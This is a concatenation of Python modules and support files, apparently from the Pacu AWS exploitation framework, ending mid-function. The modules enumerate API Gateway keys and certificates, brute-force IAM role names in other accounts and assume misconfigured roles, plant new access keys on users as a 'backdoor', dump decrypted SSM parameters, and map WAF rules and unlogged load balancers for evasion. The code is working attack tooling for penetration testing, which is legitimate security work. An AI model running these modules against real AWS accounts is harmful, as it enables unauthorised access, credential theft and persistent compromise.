from sqlalchemy import create_engine
from sqlalchemy.engine.base import Engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker

from pacu.settings import DATABASE_CONNECTION_PATH

engine: Engine = create_engine(DATABASE_CONNECTION_PATH)
Session: sessionmaker = sessionmaker(bind=engine)


Base = declarative_base()



#!/usr/bin/env python3

import argparse
import os
from pathlib import Path
import pprint
import json
import time

from pacu.core.lib import downloads_dir

module_info = {
    'name': 'enum__apigateway',
    'author': 'Sebastian Mora seb@ruse.tech',
    'category': 'ENUM',
    'one_liner': 'Enumerate API Gateway.',
    'description': 'Enumerate API Gateway. For each API this module enumerates available routes, methods, API keys and ' +
                   'client certificates. Results and Swagger definitions will be exported to the session download directory.',
    'services': ['apigateway'],
    'prerequisite_modules': [''],
    'arguments_to_autocomplete': ['--regions'],
}

parser = argparse.ArgumentParser(add_help=False, description=str(module_info['description']))

parser.add_argument(
    '--regions',
    required=False,
    help='Regions to enumerate'
)

pp = pprint.PrettyPrinter(indent=2)


# Get all resources for  API
#
# return [] dict
def get_api_resources(client, api_id):
    response = client.get_resources(restApiId=api_id)
    return response['items']


# Get All deployment stages of API
#
# returns [] string
def get_api_stages(client, api_id):
    response = client.get_stages(restApiId=api_id)
    names = []
    for stage in response['item']:
        if(stage.get('stageName')):
            names.append(stage['stageName'])
    return names


# Get all supported methods per api resources "/users"
#
# Returns [] dict
def get_api_methods(client, api_id, resource):
    routes = []
    if resource.get('resourceMethods'):
        for method in resource.get('resourceMethods'):
            response = client.get_method(
                restApiId=api_id,
                resourceId=resource['id'],
                httpMethod=method
            )
            routes.append(response)
    return routes


def get_api_keys(client):
    response = client.get_api_keys(limit=500, includeValues=True)
    if response.get('items'):
        return response['items']
    return []


def get_client_certs(client):
    response = client.get_client_certificates(limit=500)
    data = []
    if response.get('items'):
        for cert in response['items']:
            res = client.get_client_certificate(clientCertificateId=cert['clientCertificateId'])
            cert['pemEncodedCertificate'] = res['pemEncodedCertificate']
        data.append(cert)
    return data


# If permissions supported export the API documentaion as Swagger File
def export_api_doc(client, session, api_summary, exportType='swagger'):

    files_names = []
    output_path = downloads_dir()/'apigateway'

    api_id = api_summary['id']
    api_name = api_summary['name']
    stages = api_summary['stages']

    for stage in stages:
        response = client.get_export(restApiId=api_id, stageName=stage, exportType=exportType)
        filename = f"{api_name}_{stage}_swagger.json"
        with open(output_path / filename, 'w') as f:
            data = json.loads(response['body'].read().decode("utf-8"))
            json.dump(data, f, indent=4)

        files_names.append(filename)

    return files_names


# Take method obj and parse into method summary
def parse_method(base_url, method, path, stages):
    api_method = {
        'uri': "",
        'requestParameters': [],
        'method': "",
        "authorizationType": "",
        "apiKeyRequired": "False",  # if there is a key this will get set to True
        'url': []
    }

    if method['methodIntegration'].get('uri'):
        api_method['uri'] = method['methodIntegration']['uri']

    if method.get('httpMethod'):
        api_method['method'] = method['httpMethod']

    if method.get('authorizationType'):
        api_method['authorizationType'] = method['authorizationType']

    if method.get('apiKeyRequired'):
        api_method['apiKeyRequired'] = method['apiKeyRequired']

    if method['methodIntegration'].get('requestParameters'):
        api_method['requestParameters'] = method['methodIntegration']['requestParameters']

    for stage in stages:
        api_method['url'].append(base_url + stage + path)

    return api_method


def main(args, pacu):
    """Main module function, called from Pacu"""
    print = pacu.print
    session = pacu.get_active_session()
    args = parser.parse_args(args)

    outfile_path = str(downloads_dir()/'apigateway')

    if args.regions:
        regions = args.regions.split(',')
    else:
        regions = pacu.get_regions('apigateway')

    # Set up summary data object
    # apis[] holds each api object which contains api info an route info
    # apikeys[] holds all api keys
    # clientCerts[] holds all client certs
    summary_data = {'apis': [], 'apiKeys': [], 'clientCerts': []}

    for region in regions:
        client = pacu.get_boto3_client('apigateway', region)
        print(f"Enumerating {region}")

        # Get global API data
        summary_data['apiKeys'] = get_api_keys(client)
        summary_data['clientCerts'] = get_client_certs(client)

        # Currently this only supports REST apis
        # Get all apis in AWS Gatway
        response = client.get_rest_apis()

        items = response['items']

        # for each api in the account
        for api in items:

            # create api objecy summary
            api_summary = {
                'id': '',
                'name': '',
                'stages': [],
                'urlBase': "",
                'urlPaths': [],
                "apiDocs": []
            }

            # Set up base info used by methods
            api_summary['id'] = api['id']
            api_summary['name'] = api['name']
            api_summary['stages'] = get_api_stages(client, api_summary['id'])
            api_summary['urlBase'] = f"https://{api_summary['id']}.execute-api.{region}.amazonaws.com/"

            print(f"Enumerating API: {api_summary['name']}")

            # For each resource get all methods and parse it into it's method summary.
            for resource in get_api_resources(client, api_summary['id']):
                for method in get_api_methods(client, api_summary['id'], resource):
                    api_summary['urlPaths'].append(parse_method(api_summary['urlBase'], method, resource['path'], api_summary['stages']))

            # Append api results to main summary
            summary_data['apis'].append(api_summary)

            # attempt to export api_docs
            api_summary['apiDocs'] = export_api_doc(client, session, api_summary)

        # Write summary all data to downloads file
        if(len(summary_data['apis']) > 0):
            print("Writing all results to file: {}/".format(outfile_path))
            filename = f"apigateway_{region}_{time.time()}.json"
            with open(outfile_path / filename, "w+") as f:
                f.write(
                    json.dumps(summary_data, indent=4, default=str)
                )
            f.close()

    return summary_data


def summary(data, pacu):
    msg = ''
    if not data:
        msg = 'Module execution failed'
    else:
        msg = "Data saved to session file."

        # Display all API routes
        print("-----API Routes-----")
        for api in data['apis']:
            print(f"\n\tAPI Name: {api['name']}")
            print(f"\tAPI Stages: {', '.join(api['stages'])}")
            print(f"\tExported Documentation: { ', '.join(api['apiDocs'])  } ")

            for url_paths in api['urlPaths']:
                # print a new http url for each staged version
                [print(f"\t\t {url_paths['method']}: {url}") for url in url_paths['url']]

        # Display Global API keys
        print("-----API Keys-----")
        for key in data['apiKeys']:
            print(f"\tKey Name: {key['name']} \n\t\tValue: {key['value']} \n\t\tcreatedDate: {key['createdDate']}")

        # Display Gloal Client Certs
        print("-----Client Certs-----")
        for cert in data['clientCerts']:
            print(f"\tCert Id: {cert['clientCertificateId']} \n\t\texpirationDate: {cert['expirationDate']} \n\t\tpem: {cert['pemEncodedCertificate']}")

    return(msg)



####################################################################
#                                                                  #
#                         MODULE ARCHIVED                          #
#                                                                  #
#   Reason: AWS implemented changes to the STS AssumeRole API so   #
#       that it no longer returns different verbose error messages #
#       depending on whether a role exists or not, so this method  #
#       of enumeration has been patched. For a new method that     #
#       does the exact same thing, look at the iam__enum_roles     #
#       module.                                                    #
#                                                                  #
####################################################################

#!/usr/bin/env python3
import argparse
import botocore
import random
import string


module_info = {
    'name': 'iam__enum_assume_role',

    'author': 'Spencer Gietzen of Rhino Security Labs',

    'category': 'RECON_UNAUTH',

    'one_liner': 'Enumerates existing roles in other AWS accounts to try and gain access via misconfigurations.',

    'description': 'This module takes in an AWS account ID and tries to enumerate role names within that account. If one is discovered and it is misconfigured to allow role-assumption from a wide group, it is possible to assume that role and gain access to that AWS account through this method. NOTE: This module is listed under the recon_enum_no_keys category because it is not recommended to use compromised keys to run this module. This module DOES require a set of AWS keys, but it will spam CloudTrail with "AssumeRole" logs, so it is suggested to use a personal account to run this. The keys you use should have the sts:AssumeRole permission on any resource ("*") to identify/assume misconfigured roles, but you will still be able to enumerate roles that exist without it.',

    'services': ['STS'],

    'prerequisite_modules': [],

    'external_dependencies': [],

    'arguments_to_autocomplete': ['--account-id', '--word-list']
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--account-id', required=True, help='The AWS account ID of the target account (12 numeric characters).')
parser.add_argument('--word-list', required=False, default=None, help='File path to a different word list to use. There is a default word list with 1100+ words and it is stored in this module\'s folder. The word list should contain words, one on each line, to use to try and guess IAM role names. Role names ARE case-sensitive.')


def main(args, pacu_main):
    args = parser.parse_args(args)
    print = pacu_main.print

    if not len(args.account_id) == 12 or not args.account_id.isdigit():
        print('Error: An AWS account ID is a number of length 12. You supplied: {}\n'.format(args.account_id))
        return None

    data = {
        'attempts': 0,
        'enumerated': [],
        'success': False
    }

    print('Targeting account ID: {}\n'.format(args.account_id))

    if args.word_list is None:
        word_list_path = './modules/{}/default-word-list.txt'.format(module_info['name'])
    else:
        word_list_path = args.word_list.strip()

    with open(word_list_path, 'r') as f:
        word_list = f.read().splitlines()

    print('Starting role enumeration...\n')

    client = pacu_main.get_boto3_client('sts')
    for word in word_list:
        role_arn = 'arn:aws:iam::{}:role/{}'.format(args.account_id, word)

        data['attempts'] += 1

        try:
            response = client.assume_role(
                RoleArn=role_arn,
                RoleSessionName=''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(20)),
                DurationSeconds=43200
            )

            print('Successfully assumed role for 12 hours: {}\n'.format(role_arn))

            data['success'] = True
            data['role_arn'] = role_arn
            response.pop('ResponseMetadata', None)
            print(response)

            break
        except botocore.exceptions.ClientError as error:
            if 'The requested DurationSeconds exceeds the MaxSessionDuration set for this role.' in str(error):
                # Found a vulnerable role, but requested more time than the max allowed for it
                print('** Found vulnerable role: {} **'.format(role_arn))
                print('  Hit max session time limit, reverting to minimum of 1 hour...\n')

                response = client.assume_role(
                    RoleArn=role_arn,
                    RoleSessionName=''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(20)),
                    DurationSeconds=3600
                )

                print('Successfully assumed role: {}\n'.format(role_arn))

                data['success'] = True
                data['role_arn'] = role_arn
                response.pop('ResponseMetadata', None)
                print(response)

                break
            elif 'Not authorized to perform sts:AssumeRole' in str(error):
                # Role not found
                pass
            elif 'is not authorized to perform: sts:AssumeRole on resource' in str(error):
                # Role found, but not allowed to assume
                print('Found restricted role: {}\n'.format(role_arn))
                data['enumerated'].append(role_arn)

    return data


def summary(data, pacu_main):
    if 'success' in data.keys() and data['success'] is True:
        return 'Successfully found a role we can assume after {} guesses: {}\nEnumerated {} restricted role(s): {}'.format(data['attempts'], data['role_arn'], len(data['enumerated']), data['enumerated'])
    else:
        return 'Did not find a role to assume after {} guesses.\nEnumerated {} restricted role(s): {}'.format(data['attempts'], len(data['enumerated']), data['enumerated'])



import os

from pacu.core.base import Base, engine
from pacu.utils import set_sigint_handler


def setup_database_if_not_present(database_file_path: str, auto_proceed: bool=True) -> bool:
    if os.path.exists(database_file_path):
        return True
    else:
        print('No database found at {}'.format(database_file_path))
        return attempt_to_create_database(database_file_path, auto_proceed)


def attempt_to_create_database(database_file_path, auto_proceed=True):
    if auto_proceed:
        proceed = 'y'
    else:
        print('A database will be created at the following location:\n    {}'.format(database_file_path))

        if os.path.exists(database_file_path):
            question = 'A file already exists at this location.\nAre you sure you want to delete and recreate it? [y/n]\n> '
        else:
            question = 'Create a new database file? [y/n]\n> '

        proceed = input(question)

    if proceed.strip().lower() == 'y':
        if os.path.exists(database_file_path):
            os.remove(database_file_path)

        # Base.metadata.create_all requires all models to be loaded before
        # tables can be created. It's is placed here for emphasis.
        from pacu.core.models import AWSKey, PacuSession
        Base.metadata.create_all(engine)

        print('Database created at {}\n'.format(database_file_path))
        return True

    else:
        print('Database creation cancelled.\n')
        return False


if __name__ == '__main__':
    from pacu.settings import DATABASE_FILE_PATH
    set_sigint_handler(exit_text='\nDatabase creation cancelled.')
    attempt_to_create_database(DATABASE_FILE_PATH, auto_proceed=False)



#!/usr/bin/env python3
import argparse
import sys

import botocore
import botocore.exceptions
import random
import string

import typing

import json

if typing.TYPE_CHECKING:
    import mypy_boto3_iam
    import mypy_boto3_iam.type_defs

module_info = {
    'name': 'iam__enum_roles',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'RECON_UNAUTH',
    'one_liner': 'Enumerates IAM roles in a separate AWS account, given the account ID.',
    'description': (
        'This module takes in a valid AWS account ID and tries to enumerate existing IAM roles within that account. It does '
        'so by trying to update the AssumeRole policy document of the role that you pass into --role-name if passed or newly'
        'created role. For your safety, it updates the policy with an explicit deny against the AWS account/IAM role, so that '
        'no security holes are opened in your account during enumeration. NOTE: It is recommended to use personal AWS access '
        'keys for this script, as it will spam CloudTrail with "iam:UpdateAssumeRolePolicy" logs and a few "sts:AssumeRole" '
        'logs. The target account will not see anything in their logs though, unless you find a misconfigured role that '
        'allows you to assume it. The keys used must have the iam:UpdateAssumeRolePolicy permission on the role that you '
        'pass into --role-name to be able to identify a valid IAM role and the sts:AssumeRole permission to try and request '
        'credentials for any enumerated roles.'
    ),
    'services': ['IAM', 'STS'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--word-list', '--role-name', '--account-id']
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--word-list', required=False, default=None,
                    help='File path to a different word list to use. There is a default word list with 1100+ words. The word '
                         'list should contain words, one on each line, to use to try and guess IAM role names. Role names ARE '
                         'case-sensitive.')
parser.add_argument('--role-name', required=False,
                    help='The name of a valid role in the current users account to try and update the AssumeRole policy '
                         'document for. If this isn\'t specified a temporary role will be created')
parser.add_argument('--account-id', required=True, help='The AWS account ID of the target account (12 numeric characters).')


chars = string.ascii_lowercase + string.ascii_uppercase + string.digits


def run(args, role_name, pacu_main, iam):
    print = pacu_main.print

    if not len(args.account_id) == 12 or not args.account_id.isdigit():
        print('Error: An AWS account ID is a number of length 12. You supplied: {}\n'.format(args.account_id))
        return None

    if args.word_list is None:
        word_list_path = './modules/{}/default-word-list.txt'.format(module_info['name'])
    else:
        word_list_path = args.word_list.strip()

    with open(word_list_path, 'r') as f:
        word_list = f.read().splitlines()

    print(
        'Warning: This script does not check if the keys you supplied have the correct permissions. Make sure they are '
        'allowed to use iam:UpdateAssumeRolePolicy on the role that you pass into --role-name and are allowed to use '
        'sts:AssumeRole to try and assume any enumerated roles!\n'
    )

    data = {
        'attempts': 0,
        'valid_roles': [],
        'roles_assumed': []
    }

    print('Targeting account ID: {}\n'.format(args.account_id))
    print('Starting role enumeration...\n')
    for word in word_list:
        sys.stderr.write('.')
        role_arn = 'arn:aws:iam::{}:role/{}'.format(args.account_id, word)

        data['attempts'] += 1

        try:
            iam.update_assume_role_policy(
                RoleName=role_name,
                PolicyDocument='''
                {{
                    "Version":"2012-10-17",
                    "Statement":[{{
                        "Effect":"Deny",
                        "Principal":{{"AWS":"{}"}},
                        "Action":"sts:AssumeRole"
                    }}]
                }}'''.format(role_arn).strip()
            )
            print('\n  Found role: {}'.format(role_arn))
            data['valid_roles'].append(role_arn)
        except botocore.exceptions.ClientError as error:
            if 'MalformedPolicyDocument' in str(error):
                # Role doesn't exist, continue on
                pass
            elif 'NoSuchEntity' in str(error):
                print('  Error: You did not pass in a valid role name. An existing role is required for this script.')
                return data
            else:
                print('  Unhandled error: {}'.format(str(error)))
                return data

    if len(data['valid_roles']) > 0:
        print('\nFound {} role(s):\n'.format(len(data['valid_roles'])))
        for role in data['valid_roles']:
            print('    {}'.format(role))
        print()

        print('Checking to see if any of these roles can be assumed for temporary credentials...\n')
        sts = pacu_main.get_boto3_client('sts')
        for role in data['valid_roles']:
            try:
                response = sts.assume_role(
                    RoleArn=role,
                    RoleSessionName=''.join(random.choice(chars) for _ in range(20)),
                    DurationSeconds=43200
                )

                print('  Successfully assumed role for 12 hours: {}\n'.format(role))

                response.pop('ResponseMetadata', None)
                print(response)

                data['roles_assumed'].append(role)
            except botocore.exceptions.ClientError as error:
                if 'The requested DurationSeconds exceeds the MaxSessionDuration set for this role.' in str(error):
                    # Can assume the role, but requested more time than the max allowed for it
                    print('  Role can be assumed, but hit max session time limit, reverting to minimum of 1 hour...\n')

                    response = sts.assume_role(
                        RoleArn=role,
                        RoleSessionName=''.join(random.choice(chars) for _ in range(20)),
                        DurationSeconds=3600
                    )

                    print('  Successfully assumed role for 1 hour: {}\n'.format(role))

                    response.pop('ResponseMetadata', None)
                    print(response)

                    data['roles_assumed'].append(role)


def main(args, pacu_main):
    args = parser.parse_args(args)
    iam: 'mypy_boto3_iam.IAMClient' = pacu_main.get_boto3_client('iam')

    if args.role_name:
        role_name = args.role_name
        resp = iam.get_role(RoleName=role_name)
        orig_trust_doc = json.dumps(resp['Role']['AssumeRolePolicyDocument'])
    else:
        role_name = f"PacuIamEnumRoles-{''.join(random.choice(chars) for _ in range(5))}"
        iam.create_role(
            RoleName=role_name,
            Description="Created by Pacu for IAM Role enumeration.",
            AssumeRolePolicyDocument='''
            {
                "Version": "2012-10-17",
                "Statement": [{
                    "Effect": "Deny",
                    "Principal": {"AWS": "*"},
                    "Action": "sts:AssumeRole"
                }]
            }
            '''.strip(),
        )

    try:
        run(args, role_name, pacu_main, iam)
    except Exception as e:
        raise e
    finally:
        if args.role_name:
            print(f"Reverting the {role_name} trust policy.")
            try:
                iam.update_assume_role_policy(RoleName=role_name, PolicyDocument=orig_trust_doc)
            except Exception as err:
                print(f"unable to revert {role_name} to it's original state. this can be done manually by updating the assume"
                      f"role document to the following: \n\n{orig_trust_doc}\n\n")
                print(err)
        else:
            print(f"Cleaning up the {role_name} role.")
            iam.delete_role(RoleName=role_name)


def summary(data, pacu_main):
    results = []

    results.append('  {} role(s) found after {} guess(es).'.format(len(data['valid_roles']), data['attempts']))

    if len(data['valid_roles']) > 0:
        results.append(f"  {len(data['roles_assumed'])} out of {len(data['valid_roles'])} enumerated role(s) successfully "
                       f"assumed.")

    return '\n'.join(results)



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'iam__backdoor_users_keys',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs based on the idea from https://github.com/dagrz/aws_pwn/blob/master/persistence/backdoor_all_users.py',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'PERSIST',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Adds API keys to other users.',

    # Description about what the module does and how it works
    'description': 'This module attempts to add an AWS API key to users in the account. If all users are going to be backdoored, if it has not already been run, this module will run "enum_users_roles_policies_groups" to fetch all of the users in the account.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['IAM'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': ['iam__enum_users_roles_policies_groups'],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--usernames'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--usernames', required=False, default=None, help='A comma-separated list of usernames of the users in the AWS account to backdoor. If not supplied, it defaults to every user in the account')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    ######

    usernames = []
    summary_data = {}
    client = pacu_main.get_boto3_client('iam')

    if args.usernames is not None:
        if ',' in args.usernames:
            usernames = args.usernames.split(',')
        else:
            usernames = [args.usernames]
    else:
        if fetch_data(['IAM', 'Users'], module_info['prerequisite_modules'][0], '--users') is False:
            print('FAILURE')
            print('  SUB-MODULE EXECUTION FAILED')
            return

        for user in session.IAM['Users']:
            usernames.append(user['UserName'])

    add_key = ''
    summary_data['Backdoored_Users_Count'] = 0
    print('Backdoor the following users?')
    for username in usernames:
        if args.usernames is None:
            add_key = input('  {} (y/n)? '.format(username))
        else:
            print('  {}'.format(username))
        if add_key == 'y' or args.usernames is not None:
            try:
                response = client.create_access_key(UserName=username)
                print('    Access Key ID: {}'.format(response['AccessKey']['AccessKeyId']))
                print('    Secret Key: {}'.format(response['AccessKey']['SecretAccessKey']))

                summary_data['Backdoored_Users_Count'] += 1

            except ClientError as error:
                code = error.response['Error']['Code']
                if code == 'AccessDenied':
                    print('    FAILURE: MISSING REQUIRED AWS PERMISSIONS')
                else:
                    print('    FAILURE: {}'.format(code))

    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'Backdoored_Users_Count' in data:
        out += '  {} user key(s) successfully backdoored.\n'.format(data['Backdoored_Users_Count'])
    return out



import os


# Meaningful values: 'minimal', 'low', 'high', 'extreme'
# 'Minimal' will only add tracebacks to error log files.
# 'Low' will also add data from the current PacuSession, with its
# secret_access_key field censored. This data includes all gathered AWS data.
# 'High' and 'extreme' will dump all global and local data in the most recent
# two stack frames, and in all stack frames, respectively, of every traceback.
# This data will include any information about your local file system and
# execution environment that Python has loaded into global and local variables
# at the time an error is written to the logs. Use with extreme caution.
from pathlib import Path

ERROR_LOG_VERBOSITY = 'minimal'

_home_dir = Path('~/.local/share/pacu')
home_dir = _home_dir.expanduser().absolute()

os.makedirs(home_dir, exist_ok=True, mode=0o700)

DATABASE_FILE_PATH = os.path.join(home_dir, 'sqlite.db')

if os.path.isabs(DATABASE_FILE_PATH):
    DATABASE_CONNECTION_PATH = 'sqlite:///' + DATABASE_FILE_PATH
else:
    DATABASE_CONNECTION_PATH = 'sqlite://' + DATABASE_FILE_PATH



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import json
import os

from pacu.core.lib import downloads_dir

module_info = {
    'name': 'systemsmanager__download_parameters',
    'author': 'David Yesland',
    'category': 'ENUM',
    'one_liner': 'Downloads all parameters and decrypted values from SSM.',
    'description': 'This module downloads all Systems Manager parameters and their value from all regions.',
    'services': ['SSM'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ["--regions"],
}

# client.get_parameters() only takes a list of 10 max
SMS_GET_PARAM_MAX = 10

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all regions.')

def main(args, pacu_main):
    session = pacu_main.get_active_session()

    print = pacu_main.print

    args = parser.parse_args(args)

    if args.regions:
        regions = args.regions.split(',')
    else:
        get_regions = pacu_main.get_regions
        regions = get_regions('ssm')

    data = {}
    for region in regions:
        param_objs = []
        NextToken = ""

        print('Looking for parameters in region {}...'.format(region))
        client = pacu_main.get_boto3_client('ssm', region)

        #Catch errors with the ssm-* regions
        try:
            param_data = client.describe_parameters()
        except:
            print('ERROR: retrieving parameters from {}'.format(region))
            continue

        #Check if any params in the region and add them to param_objs
        if param_data["Parameters"]:
            data[region] = {}
            print('    Found parameters in region {}...'.format(region))
            param_objs += (param_data["Parameters"])
        else:
            continue

        try:
            NextToken = param_data["NextToken"]
        except KeyError:
            pass

        #Paginate the results if needed, add them to param_objs
        if NextToken:
            while True:
                param_data = client.describe_parameters(NextToken=NextToken)
                param_objs += (param_data["Parameters"])
                try:
                    NextToken = param_data["NextToken"]
                except KeyError:
                        break

        #Dump all param_objs Name fields into the data for the region
        for param_obj in param_objs:
            name = param_obj["Name"]
            data[region][name] = ""

        #Pull all param names for the region to then grab the values
        param_names = list(data[region].keys())

        #client.get_parameters() only takes a list of 10 max, so break it up into 10s
        #Reference: https://www.geeksforgeeks.org/break-list-chunks-size-n-python/
        param_names_by_max = [param_names[i * SMS_GET_PARAM_MAX:(i + 1) * SMS_GET_PARAM_MAX] for i in range((len(param_names) + SMS_GET_PARAM_MAX - 1) // SMS_GET_PARAM_MAX )]

        for names in param_names_by_max:
            full_params = client.get_parameters(Names=names,
                                                WithDecryption=True)

            for param_obj in full_params["Parameters"]:
                data[region][param_obj["Name"]] = param_obj["Value"]

    #data is a JSON object like
    # {"us-east-1":
    #              {
    #               "param_name1":"param_value1",
    #               "param_name2":"param_value2"
    #               }
    # }

    for ssm_region in data.keys():
        with open(downloads_dir()/'ssm_parameters/{}.txt'.format(ssm_region), 'w+') as f:
            json.dump(data[ssm_region], f, indent=2)

    info = {}
    info["save_path"] = str(downloads_dir()/'ssm_parameters/')
    info["region_count"] = str(len(data.keys()))
    total_params = 0
    for param_region in data.keys():
        total_params += len(data[param_region].keys())
    info["total_params"] = str(total_params)
    return info


# The summary function will be called by Pacu after running main
def summary(data, pacu_main):

    if data.keys():
        return 'Downloaded {} SSM parameters and values from {} region(s).\nSaved to: {}'.format(data["total_params"],data["region_count"],data["save_path"])
    else:
        return 'No SSM parameters found.'



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from copy import deepcopy

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'waf__enum',

    # Name and any other notes about the author
    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EVADE',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Detects rules and rule groups for WAF.',

    # Description about what the module does and how it works
    'description': 'This module will enumerate WAF. The enumerated data includes the rule groups, rules and matching sets for those rules. Global WAF settings are enumerated the same as each individually-configured region, but they are stored separately in the Pacu database.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['waf', 'waf-regional'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--regions', '--global-region'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument(
    '--regions',
    required=False,
    default=None,
    help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all available regions.'
)
parser.add_argument(
    '--global-region',
    required=False,
    default=False,
    action='store_true',
    help='Flag to enumerate WAF information for all regions.'
)

METHODS = [
    ('byte_match_sets', 'ByteMatchSets'),
    ('geo_match_sets', 'GeoMatchSets'),
    ('ip_sets', 'IPSets'),
    ('rate_based_rules', 'Rules'),
    ('regex_match_sets', 'RegexMatchSets'),
    ('regex_pattern_sets', 'RegexPatternSets'),
    ('rule_groups', 'RuleGroups'),
    ('rules', 'Rules'),
    ('size_constraint_sets', 'SizeConstraintSets'),
    ('sql_injection_match_sets', 'SqlInjectionMatchSets'),
    ('subscribed_rule_groups', 'RuleGroups'),
    ('web_acls', 'WebACLs'),
    ('xss_match_sets', 'XssMatchSets'),
]


def grab_data(client, function, key, **kwargs):
    """Grabs all data given a function and a key."""
    out = []
    caller = getattr(client, function)
    try:
        response = caller(**kwargs)
        out.extend(response[key])
        while 'NextMarker' in response:
            response = caller(**kwargs, NextMarker=response['NextMarker'])
            out.extend(response[key])
        print('   Found {} {}'.format(len(out), key))
    except ClientError as error:
        if error.response['Error']['Code'] == 'AccessDeniedException':
            print('AccessDenied for: {}'.format(function))
        return []
    return out


def grab_id_data(client, func, param):
    """Helper function to grab conditions and filters for WAF resources."""
    caller = getattr(client, func)
    try:
        response = caller(**param)
        del response['ResponseMetadata']
        # Pull out the actual fields from the response and return them.
        for key in response:
            return response[key]
    except ClientError as error:
        if error.response['Error']['Code'] == 'AccessDeniedException':
            print('AccessDenied for: {}'.format(func))
    return {}


def consistentCase(name):
    """Converts snake_case strings to CameCase"""
    splitted = name.split('_')
    out = ''.join([word[0].upper() + word[1:] for word in splitted])
    return out


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    regions = get_regions('waf-regional') if args.regions is None else args.regions.split(',')

    waf_regional_data = {}
    waf_global_data = {}
    for key, val in METHODS:
        waf_regional_data[val] = []
        waf_global_data[val] = []

    for region in regions:
        print('  Staring enumeration of region: {}...'.format(region))
        client = pacu_main.get_boto3_client('waf-regional', region)
        for func, key in METHODS:
            items = grab_data(client, 'list_' + func, key)
            for index, item in enumerate(items):
                param_key = key[:-1] + 'Id'
                param = {param_key: item[param_key]}
                new_data = grab_id_data(client, 'get_' + func[:-1], param)
                new_data['region'] = region
                items[index] = new_data
            waf_regional_data[key].extend(items)

    # Grab additional data specifically for RuleGroups.
    for rule_group in waf_regional_data['RuleGroups']:
        region = rule_group['region']
        client = pacu_main.get_boto3_client('waf-regional', region)
        group_id = rule_group['RuleGroupId']
        rule_group['ActivatedRules'] = grab_data(
            client,
            'list_activated_rules_in_rule_group',
            'ActivatedRules',
            RuleGroupId=group_id
        )
    waf_region_data = deepcopy(session.WAFRegional)
    waf_region_data.update(waf_regional_data)
    session.update(pacu_main.database, WAFRegional=waf_region_data)

    if args.global_region:
        client = pacu_main.get_boto3_client('waf')
        print('  Starting enumeration for global WAF...')
        for func, key in METHODS:
            items = grab_data(client, 'list_' + func, key)
            for index, item in enumerate(items):
                param_key = key[:-1] + 'Id'
                param = {param_key: item[param_key]}
                new_data = grab_id_data(client, 'get_' + func[:-1], param)
                items[index] = new_data
            waf_global_data[key].extend(items)

        # Grab additional data specifically for RuleGroups.
        for rule_group in waf_global_data['RuleGroups']:
            group_id = rule_group['RuleGroupId']
            rule_group['ActivatedRules'] = grab_data(
                client,
                'list_activated_rules_in_rule_group',
                'ActivatedRules',
                RuleGroupId=group_id
            )
        waf_data = deepcopy(session.WAF)
        waf_data.update(waf_global_data)
        session.update(pacu_main.database, WAF=waf_data)

    summary_data = {}
    for func, key in METHODS:
        summary_data[key] = len(waf_global_data[key]) + len(waf_regional_data[key])
    return summary_data


def summary(data, pacu_main):
    out = ''
    for key in data:
        out += '  Found {} Total {}.\n'.format(data[key], key)
    return out



#!/usr/bin/env python3
import argparse
from copy import deepcopy
import time

from botocore.exceptions import ClientError

from pacu.core.lib import strip_lines, save
from pacu import Main

module_info = {
    'name': 'elb__enum_logging',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'EVADE',
    'one_liner': 'Collects a list of Elastic Load Balancers without access logging.',
    'description': strip_lines('''
        This module will enumerate all EC2 Elastic Load Balancers and save their data to the current session, as well as
        write a list of ELBs with logging disabled to
        ~/.local/share/pacu/sessions/[current_session_name]/downloads/elbs_no_logs_[timestamp].csv.
    '''),
    'services': ['ElasticLoadBalancing'],
    'prerequisite_modules': [],
    'arguments_to_autocomplete': ['--regions'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help=strip_lines('''
    One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.
'''))


def main(args, pacu_main: 'Main'):
